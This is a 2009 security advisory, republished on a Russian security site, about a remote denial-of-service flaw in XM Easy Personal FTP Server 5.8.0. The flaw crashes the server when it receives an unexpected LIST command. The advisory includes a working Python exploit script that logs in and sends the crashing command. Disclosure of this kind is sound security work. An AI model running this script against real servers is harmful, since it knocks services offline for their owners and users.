Информационная безопасность
[RU] switch to English


Дополнительная информация

  DoS против DXMSoft XM Easy Personal FTP Server

  XM Easy Personal FTP Server Remote DoS Vulnerability

  XM Easy Personal FTP Server 'APPE' and 'DELE' Command Remote Denial of Service Vulnerability

From:zhangmc_(at)_mail.ustc.edu.cn <zhangmc_(at)_mail.ustc.edu.cn>
Date:11 ноября 2009 г.
Subject:XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability

Date of Discovery: 10-Nov-2009

Credits:zhangmc[at]mail.ustc.edu.cn

Vendor: Dxmsoft

Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is a easy use FTP server Application. Denial of service vulnerability
exists in XM Personal FTP Server that causes the application to crash when the "LIST" is sent to FTP
server if you do not use "PASV" or "POST" first.

Details:
XM Easy Personal FTP Server can't handle "LIST" command if you do not use "PASV" or "POST" first.If
you have logged on the server successfully,a "LIST" command will lead the ftp server to crash.

Severity:
High

Exploit example:
#!/usr/bin/python
import socket
import sys

def Usage():
   print ("Usage:  ./expl.py <serv_ip>      <Username> <password>\n")
   print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
       Usage()
       sys.exit(1)
else:
   hostname=sys.argv[1]
   username=sys.argv[2]
   passwd=sys.argv[3]
   sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   try:
       sock.connect((hostname, 21))
   except:
       print ("Connection error!")
       sys.exit(1)
   r=sock.recv(1024)
   sock.send("user %s\r\n" %username)
   r=sock.recv(1024)
   sock.send("pass %s\r\n" %passwd)
   r=sock.recv(1024)
   sock.send("LIST\r\n")
   sock.close()
   sys.exit(0);

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород